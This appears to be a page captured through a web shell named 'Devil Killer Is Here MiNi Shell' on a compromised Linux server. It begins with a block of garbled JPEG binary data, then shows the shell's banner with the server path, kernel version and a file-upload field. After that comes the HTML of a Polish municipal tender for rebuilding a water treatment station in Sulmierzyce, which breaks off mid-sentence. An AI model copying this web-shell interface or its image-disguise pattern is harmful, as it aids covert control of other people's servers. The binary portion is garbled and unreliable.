JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240705/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240705/0039864001-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rozbudowa i przebudowa stacji uzdatniania wody w Sulmierzycach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MIEJSKA SULMIERZYCE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 250855357</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Rynek 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sulmierzyce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-750</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL416 - Kaliski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 623666159</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">inwestycje@sulmierzyce.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sulmierzyce.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbudowa i przebudowa stacji uzdatniania wody w Sulmierzycach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-53b7c4de-39de-11ef-880f-0e435a8a43bc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00398640</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00048204/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Rozbudowa i przebudowa stacji uzdatniania wody w Sulmierzycach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-53b7c4de-39de-11ef-880f-0e435a8a43bc <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja między zamawiającym<br/>a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, odbywa się przy użyciu Platformy e-<br/>Zamówienia, która jest dostępna pod adresem: https://ezamowienia.gov.pl<br/>2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>3. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu<br/>„Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki<br/>korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej<br/>https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>4. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia<br/>ani logowania.<br/>5. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści<br/>zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych<br/>6. Oferty, oświadczenia, o których mowa w art. 125 ust.1 ustawy Pzp, podmiotowe środki dowodowe, w tym oświadczenie, o którym<br/>mowa w art. 117 ust. 4 ustawy Pzp, oraz zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy<br/>Pzp, zwane dalej „zobowiązaniem podmiotu udostępniającego zasoby”, przedmiotowe środki dowodowe, pełnomocnictwo,<br/>dokumenty, o których mowa w art. 94 ust. 2 ustawy Pzp, sporządza się w postaci elektronicznej, w formatach danych określonych w<br/>przepisach wydanych na podstawie art.18 ustawy z dnia 17 lutego 2005r. o informatyzacji działalności podmiotów realizujących<br/>zadania publiczne (Dz. U. z2020r. poz.346, 568, 695, 1517 i2320).<br/>7. Szczegółowe wymagania techniczne dla dokumentów elektronicznych oraz wymagania techniczne i organizacyjne użycia środków<br/>komunikacji elektronicznej służących do odbioru dokumentów elektronicznych zostały określone w Rozporządzeniu Prezesa Rady<br/>Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie (Dz. U. 2020 r., poz. 2452)<br/>8. Komunikacja w postępowaniu, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się<br/>drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do<br/>komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień,<br/>zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej<br/>wiadomości (przycisk „dodaj załącznik”).<br/>9. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy”<br/>na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji”<br/>służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta<br/>uproszczonego na Platformie e-Zamówienia.<br/>10. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja”.<br/>11. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>12. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust.1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 016/679<br/>z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych Dz. Urz. UE L<br/>119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/> administratorem Pani/Pana danych osobowych jest Burmistrz Sulmierzyc, z siedzibą w Sulmierzycach<br/>Możesz się z nami skontaktować w następujący sposób:<br/>listownie na adres: ul. Rynek 11, 63-750 Sulmierzyce<br/>• przez e-mail: burmistrz@sulmierzyce.pl<br/>• telefonicznie: +48 62 7223218.<br/> inspektorem ochrony danych osobowych w Gminie miejskiej Sulmierzyce jest Pani Urszula Sobierajska. Inspektor to Osoba, z<br/>którą możesz się kontaktować we wszystkich sprawach dotyczących przetwarzania Twoich danych osobowych oraz korzystania z<br/>przysługujących Ci praw związanych z przetwarzaniem danych. Możesz się z nim kontaktować w następujący sposób:<br/>• listownie na adres: ul. Rynek 11, 63-750 Sulmierzyce<br/>• przez e-mail: iod@sulmierzyce.pl<br/>• telefonicznie: +48 62 7223201.<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. C RODO<br/>w celu związanym z postępowaniem o udzielenie zamówienia klasycznego art.275 pkt. 1 znak PB.271.4.2022;<br/>odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>Pani/Pana dane osobowe będą przechowywane przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a<br/>jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/> obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane<br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana<br/>dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych**;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania<br/>danych osobowych z zastrzeżeniem przypadków, o których mowa w art.18 ust. 2 RODO ***;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych ,gdyż podstawą prawną jest art 6 ust1 lit.c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PB.271.2.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia &#34;Rozbudowa istniejącej stacji uzdatniania wody w Sulmierzycach w systemie zaprojektuj i wybuduj&#34; obejmuje :<br/>- Opracowanie dokumentacji technicznej budowlanej i wykonawczej, uzyskanie w imieniu Zamawiającego niezbędnych uzgodnień i decyzji oraz uzyskanie ostatecznej decyzji - pozwolenia na budowę.<br/>Dokumentację budowlano-wykonawczą należy opracować stosownie do zapisów załączonego Programu Funkcjonalno - Użytkowego stanowiącego załącznik nr 1 do SWZ <br/>-Wykonanie robót budowlanych zgodnie z opracowaną dokumentacją projektową </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45223100-7 - Montaż konstrukcji metalowych</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45340000-2 - Instalowanie ogrodzeń, płotów i sprzętu ochronnego</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45316000-5 - Instalowanie systemów oświetleniowych i sygnalizacyjnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zakres objęty opcją nr 1:<br/>Należy dokonać wymiany istniejących wodomierzy (podliczników) w ilości 303 szt. na wodomierze wyposażone w nakładki umożliwiające odczyt zdalny oraz wdrożyć system zdalnego odczytu wodomierzy. W ramach wymiany wodomierzy Wykonawca dokona również wymiany całego zestawu wodomierzowego (zawory odcinające, zawór antyskażeniowy itp.) w przypadku jeżeli ich stan techniczny nie będzie odpowiadał obowiązującym przepisom oraz w przypadku stwierdzenia ich zużycia. Zainstalowany system odczytu musi pochodzić od tego samego dostawcy i być w pełni zgodny z systemem odczytu wodomierzy głównych.<br/><br/>Zakres objęty opcją nr 2:<br/>Należy wykonać wymianę sieci wodociągowych prowadzonych w ulicach - ul. Nowa, ul. Rynek, ul. Nowokościelna, ul. Szkolna, ul. Piotra Zielińskiego wraz wymianą istniejących przyłączy wodociągowych na tym odcinku. Szczegółowy zakres prac został określony w pkt. 2.1.8. PFU stanowiącego załącznik do SWZ. <br/><br/>Zakres objęty opcją nr 3:<br/>Należy wykonać wymianę istniejących przyłączy wodociągowych w ilości 450 szt. wraz z montażem studni wodomierzowej na każdym z przyłączy. Przed przystąpieniem do wymiany przyłączy Wykonawca przekaże Zamawiającemu inwentaryzację istniejących przyłączy celem zatwierdzenia przez Zamawiającego. Po zatwierdzeniu dokumentu przez Zamawiającego Wykonawca przystąpi do wymiany przyłączy.<br/><br/>a) Zamawiający zastrzega sobie możliwość skorzystania z opisanego prawa opcji w całości lub w części, w przypadku gdy zapewni źródła finansowania.<br/>b) Opcja może obejmować jeden, kilka lub wszystkie zakresy zamówienia wskazane w pkt. 3.4 powyżej,<br/>c) Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem Zamawiającego, dlatego też nieskorzystanie przez Zamawiającego z prawa opcji nie stanowi podstawy dla Wykonawcy do dochodzenia jakichkolwiek roszczeń w stosunku do Zamawiającego; <br/>e) Zawiadomienie o skorzystaniu z prawa opcji przez Zamawiającego zostanie złożone Wykonawcy po wyborze zakresu obowiązkowego.<br/>f) Termin realizacji (wykonania) zamówienia objętego prawem opcji nie może być dłuższy niż termin na wykonanie robót podstawowych (gwarantowanych)<br/>Zasady dotyczące realizacji zamówienia objętego prawem opcji będą takie same jak te, które obowiązują przy realizacji zamówienia podstawowego. Zamawiający zastrzega również, że ceny objęte opcją będą niezmienne w całym okresie realizacji umowy.<br/>g) Przedmiot zamówienia, zarówno gwarantowanego, jak i opcjonalnego objęty zostanie rękojmią oraz gwarancją jakości zgodnie z ofertą przez okres podany w ofercie. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące kryteria oceny ofert:<br/>1. Cena oferty (brutto ) - 60 %<br/>2. Okres gwarancji i rękojmi - 40 %</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wykonawca spełni warunek, jeżeli wykaże że: <br/><br/>1) - posiada doświadczenie, tj. w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej dwie roboty budowlane polegające na budowie/modernizacji/przebudowie stacji uzdatniania wody, które swym zakresem obejmowały obejmował roboty w branżach elektrycznej, AKPiA, konstrukcyjno-budowlanej, sanitarnej i technologicznej w tym kompleksową wymianę układu technologii uzdatniania wody, budowę stalowych zbiorników retencyjnych oraz kompletny system sterowania (AKPiA). Każde o wartości nie mniejszej niż 7 000 000,00 zł brutto,<br/>- posiada doświadczenie, tj. w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedno zadania polegające na budowie/modernizacji/przebudowie stacji uzdatniania wody o wydajności technologii uzdatniania wody 45 m3/h, które swym zakresem obejmowało roboty w branżach elektrycznej, AKPiA, konstrukcyjno-budowlanej, sanitarnej i technologicznej w tym kompleksową wymianę układu technologii uzdatniania wody, budowę stalowych zbiorników retencyjnych oraz kompletny system sterowania (AKPiA) zrealizowane w formule zaprojektuj i wybuduj,<br/>- posiada doświadczenie, tj. w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej dwa zadania polegające na budowie/modernizacji/przebudowie sieci wodociągowej o długości min. 1 km w formule zaprojektuj i wybuduj,<br/>- posiada doświadczenie, tj. w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedno zadanie polegające na montażu i uruchomieniu min. 500 szt. wodomierzy wyposażonych w system zdalnego odczytu (nakładki radiowe),<br/>- posiada doświadczenie, tj. w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał usługę polegającą na prowadzeniu bieżącej eksploatacji stacji uzdatniania wody o wydajności min. 45 m3/h przez okres minimum 6 miesięcy,<br/><br/>2) dysponowali w okresie wykonywania zamówienia i skierowali do jego realizacji minimum po 1 osobie w następujących specjalnościach:<br/>- Projektant branży sanitarnej: (w rozumieniu ustawy Prawo budowlane) - niniejsza osoba ma posiadać następujące kwalifikacje zawodowe, doświadczenie i wykształcenie oraz uprawnienia:<br/>wykształcenie wyższe inżynierskie,<br/>doświadczenie polegające na uczestniczeniu w opracowaniu jako projektant branży sanitarnej jednego projektu budowlanego lub wykonawczego budowy/ przebudowy/ rozbudowy stacji uzdatniania wody o wydajności co najmniej 45 m3/h, <br/>uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, <br/>posługiwać się językiem polskim lub dysponować tłumaczem języka polskiego.<br/><br/> - Projektant Konstruktor: (w rozumieniu ustawy Prawo budowlane) - niniejsza osoba ma posiadać następujące kwalifikacje zawodowe, doświadczenie i wykształcenie oraz uprawnienia:<br/>wykształcenie wyższe inżynierskie,<br/>doświadczenie polegające na uczestniczeniu w opracowaniu jako projektant branży konstrukcyjnej jednego projektu budowlanego lub wykonawczego budowy/ przebudowy/ rozbudowy stacji uzdatniania wody o wydajności co najmniej 45 m3/h, <br/>uprawnienia budowlane do projektowania w specjalności konstrukcyjno-budowlanej,<br/>posługiwać się językiem polskim lub dysponować tłumaczem języka polskiego.<br/><br/>- Projektant branży elektrycznej; (w rozumieniu ustawy Prawo budowlane) - niniejsza osoba ma posiadać następujące kwalifikacje zawodowe, doświadczenie i wykształcenie oraz uprawnienia:<br/>wykształcenie wyższe inżynierskie,<br/>doświadczenie polegające na uczestniczeniu w opracowaniu jako projektant branży elektrycznej jednego projektu budowlanego lub wykonawczego budowy/ przebudowy/ rozbudowy stacji uzdatniania wody o wydajności co najmniej 45 m3/h, <br/>uprawnienia budowlane do projektowania w specjalności elektrycznej w zakresie sieci, 